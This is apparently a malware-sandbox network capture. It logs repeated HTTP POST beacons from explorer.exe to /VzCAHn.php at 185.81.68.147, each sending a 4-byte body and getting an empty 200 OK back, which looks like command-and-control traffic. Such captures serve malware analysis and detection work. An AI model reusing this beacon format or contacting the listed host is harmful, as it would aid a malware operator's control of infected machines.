                                                                                                                                                                                                                      Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                                                                                                                                                                      X-Powered-By: PHP/8.2.12
                                                                                                                                                                                                                      Content-Length: 0
                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                      16192.168.2.849725185.81.68.147804084C:\Windows\explorer.exe
                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                      Dec 17, 2024 10:15:35.140712976 CET278OUTPOST /VzCAHn.php?2F409E82DCA61388941053 HTTP/1.1
                                                                                                                                                                                                                      Host: 185.81.68.147
                                                                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                                                                      Content-type: text/html
                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3
                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                      Dec 17, 2024 10:15:35.262645006 CET6OUTData Raw: 45 51 0d 5f
                                                                                                                                                                                                                      Data Ascii: EQ_
                                                                                                                                                                                                                      Dec 17, 2024 10:15:36.764745951 CET216INHTTP/1.1 200 OK
                                                                                                                                                                                                                      Date: Tue, 17 Dec 2024 17:15:35 GMT
                                                                                                                                                                                                                      Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                                                                                                                                                                      X-Powered-By: PHP/8.2.12
                                                                                                                                                                                                                      Content-Length: 0
                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                      17192.168.2.849726185.81.68.147804084C:\Windows\explorer.exe
                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                      Dec 17, 2024 10:15:37.000196934 CET278OUTPOST /VzCAHn.php?2F409E82DCA61388941053 HTTP/1.1
                                                                                                                                                                                                                      Host: 185.81.68.147
                                                                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                                                                      Content-type: text/html
                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3
                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                      Dec 17, 2024 10:15:37.124977112 CET6OUTData Raw: 45 51 0d 5f
                                                                                                                                                                                                                      Data Ascii: EQ_
                                                                                                                                                                                                                      Dec 17, 2024 10:15:38.624203920 CET216INHTTP/1.1 200 OK
                                                                                                                                                                                                                      Date: Tue, 17 Dec 2024 17:15:37 GMT
                                                                                                                                                                                                                      Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                                                                                                                                                                      X-Powered-By: PHP/8.2.12
                                                                                                                                                                                                                      Content-Length: 0
                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                      18192.168.2.849727185.81.68.147804084C:\Windows\explorer.exe
                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                      Dec 17, 2024 10:15:38.875072956 CET278OUTPOST /VzCAHn.php?2F409E82DCA61388941053 HTTP/1.1
                                                                                                                                                                                                                      Host: 185.81.68.147
                                                                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                                                                      Content-type: text/html
                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3
                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                      Dec 17, 2024 10:15:38.994899035 CET6OUTData Raw: 45 51 0d 5f
                                                                                                                                                                                                                      Data Ascii: EQ_
                                                                                                                                                                                                                      Dec 17, 2024 10:15:40.482171059 CET216INHTTP/1.1 200 OK
                                                                                                                                                                                                                      Date: Tue, 17 Dec 2024 17:15:39 GMT
                                                                                                                                                                                                                      Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                                                                                                                                                                      X-Powered-By: PHP/8.2.12
                                                                                                                                                                                                                      Content-Length: 0
                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                      19192.168.2.849728185.81.68.147804084C:\Windows\explorer.exe
                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                      Dec 17, 2024 10:15:40.720248938 CET278OUTPOST /VzCAHn.php?2F409E82DCA61388941053 HTTP/1.1
                                                                                                                                                                                                                      Host: 185.81.68.147
                                                                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                                                                      Content-type: text/html
                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3
                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                      Dec 17, 2024 10:15:40.844068050 CET6OUTData Raw: 45 51 0d 5f
                                                                                                                                                                                                                      Data Ascii: EQ_
                                                                                                                                                                                                                      Dec 17, 2024 10:15:42.167386055 CET216INHTTP/1.1 200 OK
                                                                                                                                                                                                                      Date: Tue, 17 Dec 2024 17:15:41 GMT
                                                                                                                                                                                                                      Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                                                                                                                                                                      X-Powered-By: PHP/8.2.12
                                                                                                                                                                                                                      Content-Length: 0
                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                      20192.168.2.849729185.81.68.147804084C:\Windows\explorer.exe
                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                      Dec 17, 2024 10:15:42.390440941 CET278OUTPOST /VzCAHn.php?2F409E82DCA61388941053 HTTP/1.1
                                                                                                                                                                                                                      Host: 185.81.68.147
                                                                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                                                                      Content-type: text/html
                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3
                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                      Dec 17, 2024 10:15:42.511755943 CET6OUTData Raw: 45 51 0d 5f
                                                                                                                                                                                                                      Data Ascii: EQ_
                                                                                                                                                                                                                      Dec 17, 2024 10:15:44.115782022 CET216INHTTP/1.1 200 OK
                                                                                                                                                                                                                      Date: Tue, 17 Dec 2024 17:15:43 GMT
                                                                                                                                                                                                                      Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                                                                                                                                                                      X-Powered-By: PHP/8.2.12
                                                                                                                                                                                                                      Content-Length: 0
                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                      21192.168.2.849730185.81.68.147804084C:\Windows\explorer.exe
                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                      Dec 17, 2024 10:15:44.344408989 CET278OUTPOST /VzCAHn.php?2F409E82DCA61388941053 HTTP/1.1
                                                                                                                                                                                                                      Host: 185.81.68.147
                                                                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                                                                      Content-type: text/html
                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3
                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                      Dec 17, 2024 10:15:44.464391947 CET6OUTData Raw: 45 51 0d 5f
                                                                                                                                                                                                                      Data Ascii: EQ_
                                                                                                                                                                                                                      Dec 17, 2024 10:15:45.794629097 CET216INHTTP/1.1 200 OK
                                                                                                                                                                                                                      Date: Tue, 17 Dec 2024 17:15:45 GMT
                                                                                                                                                                                                                      Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                                                                                                                                                                      X-Powered-By: PHP/8.2.12
                                                                                                                                                                                                                      Content-Length: 0
                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                      22192.168.2.849731185.81.68.147804084C:\Windows\explorer.exe
                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                      Dec 17, 2024 10:15:46.031214952 CET278OUTPOST /VzCAHn.php?2F409E82DCA61388941053 HTTP/1.1
                                                                                                                                                                                                                      Host: 185.81.68.147
                                                                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                                                                      Content-type: text/html
                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3
                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                      Dec 17, 2024 10:15:46.151268959 CET6OUTData Raw: 45 51 0d 5f
                                                                                                                                                                                                                      Data Ascii: EQ_
                                                                                                                                                                                                                      Dec 17, 2024 10:15:47.462456942 CET216INHTTP/1.1 200 OK
                                                                                                                                                                                                                      Date: Tue, 17 Dec 2024 17:15:46 GMT
                                                                                                                                                                                                                      Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                                                                                                                                                                      X-Powered-By: PHP/8.2.12
                                                                                                                                                                                                                      Content-Length: 0
                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                      23192.168.2.849732185.81.68.147804084C:\Windows\explorer.exe
                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                      Dec 17, 2024 10:15:47.709819078 CET278OUTPOST /VzCAHn.php?2F409E82DCA61388941053 HTTP/1.1
                                                                                                                                                                                                                      Host: 185.81.68.147
                                                                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                                                                      Content-type: text/html
                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3
                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                      Dec 17, 2024 10:15:47.829757929 CET6OUTData Raw: 45 51 0d 5f
                                                                                                                                                                                                                      Data Ascii: EQ_
                                                                                                                                                                                                                      Dec 17, 2024 10:15:49.163413048 CET216INHTTP/1.1 200 OK
                                                                                                                                                                                                                      Date: Tue, 17 Dec 2024 17:15:48 GMT
                                                                                                                                                                                                                      Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                                                                                                                                                                      X-Powered-By: PHP/8.2.12
                                                                                                                                                                                                                      Content-Length: 0
                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                      24192.168.2.849733185.81.68.147804084C:\Windows\explorer.exe
                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                      Dec 17, 2024 10:15:49.391196012 CET278OUTPOST /VzCAHn.php?2F409E82DCA61388941053 HTTP/1.1
                                                                                                                                                                                                                      Host: 185.81.68.147
                                                                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                                                                      Content-type: text/html
                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3
                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                      Dec 17, 2024 10:15:49.513181925 CET6OUTData Raw: 45 51 0d 5f
                                                                                                                                                                                                                      Data Ascii: EQ_
                                                                                                                                                                                                                      Dec 17, 2024 10:15:51.043869972 CET216INHTTP/1.1 200 OK
                                                                                                                                                                                                                      Date: Tue, 17 Dec 2024 17:15:50 GMT
                                                                                                                                                                                                                      Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                                                                                                                                                                      X-Powered-By: PHP/8.2.12
                                                                                                                                                                                                                      Content-Length: 0
                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                      25192.168.2.849734185.81.68.147804084C:\Windows\explorer.exe
                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                      Dec 17, 2024 10:15:51.403578997 CET278OUTPOST /VzCAHn.php?2F409E82DCA61388941053 HTTP/1.1
                                                                                                                                                                                                                      Host: 185.81.68.147
                                                                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                                                                      Content-type: text/html
                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3
                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                      Dec 17, 2024 10:15:51.523895025 CET6OUTData Raw: 45 51 0d 5f
                                                                                                                                                                                                                      Data Ascii: EQ_
                                                                                                                                                                                                                      Dec 17, 2024 10:15:53.068607092 CET216INHTTP/1.1 200 OK
                                                                                                                                                                                                                      Date: Tue, 17 Dec 2024 17:15:52 GMT
                                                                                                                                                                                                                      Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                                                                                                                                                                      X-Powered-By: PHP/8.2.12
                                                                                                                                                                                                                      Content-Length: 0
                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                      26192.168.2.849736185.81.68.147804084C:\Windows\explorer.exe
                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                      Dec 17, 2024 10:15:53.343363047 CET278OUTPOST /VzCAHn.php?2F409E82DCA61388941053 HTTP/1.1
                                                                                                                                                                                                                      Host: 185.81.68.147
                                                                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                                                                      Content-type: text/html
                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3
                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                      Dec 17, 2024 10:15:53.463334084 CET6OUTData Raw: 45 51 0d 5f
                                                                                                                                                                                                                      Data Ascii: EQ_
                                                                                                                                                                                                                      Dec 17, 2024 10:15:54.799954891 CET216INHTTP/1.1 200 OK
                                                                                                                                                                                                                      Date: Tue, 17 Dec 2024 17:15:53 GMT
                                                                                                                                                                                                                      Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                                                                                                                                                                      X-Powered-By: PHP/8.2.12
                                                                                                                                                                                                                      Content-Length: 0
                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                      27192.168.2.849737185.81.68.147804084C:\Windows\explorer.exe
                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                      Dec 17, 2024 10:15:55.030926943 CET278OUTPOST /VzCAHn.php?2F409E82DCA61388941053 HTTP/1.1
                                                                                                                                                                                                                      Host: 185.81.68.147
                                                                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                                                                      Content-type: text/html
                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3
                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                      Dec 17, 2024 10:15:55.151540995 CET6OUTData Raw: 45 51 0d 5f
                                                                                                                                                                                                                      Data Ascii: EQ_
                                                                                                                                                                                                                      Dec 17, 2024 10:15:56.634978056 CET216INHTTP/1.1 200 OK
                                                                                                                                                                                                                      Date: Tue, 17 Dec 2024 17:15:55 GMT
                                                                                                                                                                                                                      Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                                                                                                                                                                      X-Powered-By: PHP/8.2.12
                                                                                                                                                                                                                      Content-Length: 0
                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                      28192.168.2.849738185.81.68.147804084C:\Windows\explorer.exe
                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                      Dec 17, 2024 10:15:56.858864069 CET278OUTPOST /VzCAHn.php?2F409E82DCA61388941053 HTTP/1.1
                                                                                                                                                                                                                      Host: 185.81.68.147
                                                                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                                                                      Content-type: text/html
                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3
                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                      Dec 17, 2024 10:15:56.978751898 CET6OUTData Raw: 45 51 0d 5f
                                                                                                                                                                                                                      Data Ascii: EQ_
                                                                                                                                                                                                                      Dec 17, 2024 10:15:58.508359909 CET216INHTTP/1.1 200 OK
                                                                                                                                                                                                                      Date: Tue, 17 Dec 2024 17:15:57 GMT
                                                                                                                                                                                                                      Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                                                                                                                                                                      X-Powered-By: PHP/8.2.12
                                                                                                                                                                                                                      Content-Length: 0
                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                      29192.168.2.849739185.81.68.147804084C:\Windows\explorer.exe
                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                      Dec 17, 2024 10:15:58.734740973 CET278OUTPOST /VzCAHn.php?2F409E82DCA61388941053 HTTP/1.1
                                                                                                                                                                                                                      Host: 185.81.68.147
                                                                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                                                                      Content-type: text/html
                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3
                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                      Dec 17, 2024 10:15:58.854907990 CET6OUTData Raw: 45 51 0d 5f
                                                                                                                                                                                                                      Data Ascii: EQ_
                                                                                                                                                                                                                      Dec 17, 2024 10:16:00.193325043 CET216INHTTP/1.1 200 OK
                                                                                                                                                                                                                      Date: Tue, 17 Dec 2024 17:15:59 GMT
                                                                                                                                                                                                                      Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                                                                                                                                                                      X-Powered-By: PHP/8.2.12
                                                                                                                                                                                                                      Content-Length: 0
                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                      30192.168.2.849740185.81.68.147804084C:\Windows\explorer.exe
                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                      Dec 17, 2024 10:16:00.421674967 CET278OUTPOST /VzCAHn.php?2F409E82DCA61388941053 HTTP/1.1
                                                                                                                                                                                                                      Host: 185.81.68.147
                                                                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                                                                      Content-type: text/html
                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3
                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                      Dec 17, 2024 10:16:00.541811943 CET6OUTData Raw: 45 51 0d 5f
                                                                                                                                                                                                                      Data Ascii: EQ_
                                                                                                                                                                                                                      Dec 17, 2024 10:16:02.026175976 CET216INHTTP/1.1 200 OK
                                                                                                                                                                                                                      Date: Tue, 17 Dec 2024 17:16:01 GMT
                                                                                                                                                                                                                      Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                                                                                                                                                                      X-Powered-By: PHP/8.2.12
                                                                                                                                                                                                                      Content-Length: 0
                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                      31192.168.2.849741185.81.68.147804084C:\Windows\explorer.exe
                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                      Dec 17, 2024 10:16:02.250353098 CET278OUTPOST /VzCAHn.php?2F409E82DCA61388941053 HTTP/1.1
                                                                                                                                                                                                                      Host: 185.81.68.147
                                                                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                                                                      Content-type: text/html
                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3
                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                      Dec 17, 2024 10:16:02.374135971 CET6OUTData Raw: 45 51 0d 5f
                                                                                                                                                                                                                      Data Ascii: EQ_
                                                                                                                                                                                                                      Dec 17, 2024 10:16:03.940649986 CET216INHTTP/1.1 200 OK
                                                                                                                                                                                                                      Date: Tue, 17 Dec 2024 17:16:02 GMT
                                                                                                                                                                                                                      Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                                                                                                                                                                      X-Powered-By: PHP/8.2.12
                                                                                                                                                                                                                      Content-Length: 0
                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                      32192.168.2.849742185.81.68.147804084C:\Windows\explorer.exe
                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                      Dec 17, 2024 10:16:04.220741034 CET278OUTPOST /VzCAHn.php?2F409E82DCA61388941053 HTTP/1.1
                                                                                                                                                                                                                      Host: 185.81.68.147
                                                                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                                                                      Content-type: text/html
                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3
                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                      Dec 17, 2024 10:16:04.340763092 CET6OUTData Raw: 45 51 0d 5f
                                                                                                                                                                                                                      Data Ascii: EQ_
                                                                                                                                                                                                                      Dec 17, 2024 10:16:05.931310892 CET216INHTTP/1.1 200 OK
                                                                                                                                                                                                                      Date: Tue, 17 Dec 2024 17:16:04 GMT
                                                                                                                                                                                                                      Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                                                                                                                                                                      X-Powered-By: PHP/8.2.12
                                                                                                                                                                                                                      Content-Length: 0
                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                      33192.168.2.849743185.81.68.147804084C:\Windows\explorer.exe
                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                      Dec 17, 2024 10:16:06.155999899 CET278OUTPOST /VzCAHn.php?2F409E82DCA61388941053 HTTP/1.1
                                                                                                                                                                                                                      Host: 185.81.68.147
                                                                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                                                                      Content-type: text/html
                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3
                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                      Dec 17, 2024 10:16:06.275787115 CET6OUTData Raw: 45 51 0d 5f
                                                                                                                                                                                                                      Data Ascii: EQ_
                                                                                                                                                                                                                      Dec 17, 2024 10:16:07.799942017 CET216INHTTP/1.1 200 OK
                                                                                                                                                                                                                      Date: Tue, 17 Dec 2024 17:16:06 GMT
                                                                                                                                                                                                                      Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                                                                                                                                                                      X-Powered-By: PHP/8.2.12
                                                                                                                                                                                                                      Content-Length: 0
                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                      34192.168.2.849744185.81.68.147804084C:\Windows\explorer.exe
                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                      Dec 17, 2024 10:16:08.032773018 CET278OUTPOST /VzCAHn.php?2F409E82DCA61388941053 HTTP/1.1
                                                                                                                                                                                                                      Host: 185.81.68.147
                                                                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                                                                      Content-type: text/html
                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3
                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                      Dec 17, 2024 10:16:08.153772116 CET6OUTData Raw: 45 51 0d 5f
                                                                                                                                                                                                                      Data Ascii: EQ_
                                                                                                                                                                                                                      Dec 17, 2024 10:16:09.888241053 CET216INHTTP/1.1 200 OK
                                                                                                                                                                                                                      Date: Tue, 17 Dec 2024 17:16:08 GMT
                                                                                                                                                                                                                      Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                                                                                                                                                                      X-Powered-By: PHP/8.2.12
                                                                                                                                                                                                                      Content-Length: 0
                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                      35192.168.2.849745185.81.68.147804084C:\Windows\explorer.exe
                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                      Dec 17, 2024 10:16:10.124592066 CET278OUTPOST /VzCAHn.php?2F409E82DCA61388941053 HTTP/1.1
                                                                                                                                                                                                                      Host: 185.81.68.147
                                                                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                                                                      Content-type: text/html
                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3
                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                      Dec 17, 2024 10:16:10.244472980 CET6OUTData Raw: 45 51 0d 5f
                                                                                                                                                                                                                      Data Ascii: EQ_
                                                                                                                                                                                                                      Dec 17, 2024 10:16:11.558052063 CET216INHTTP/1.1 200 OK
                                                                                                                                                                                                                      Date: Tue, 17 Dec 2024 17:16:10 GMT
                                                                                                                                                                                                                      Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                                                                                                                                                                      X-Powered-By: PHP/8.2.12
                                                                                                                                                                                                                      Content-Length: 0
                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8


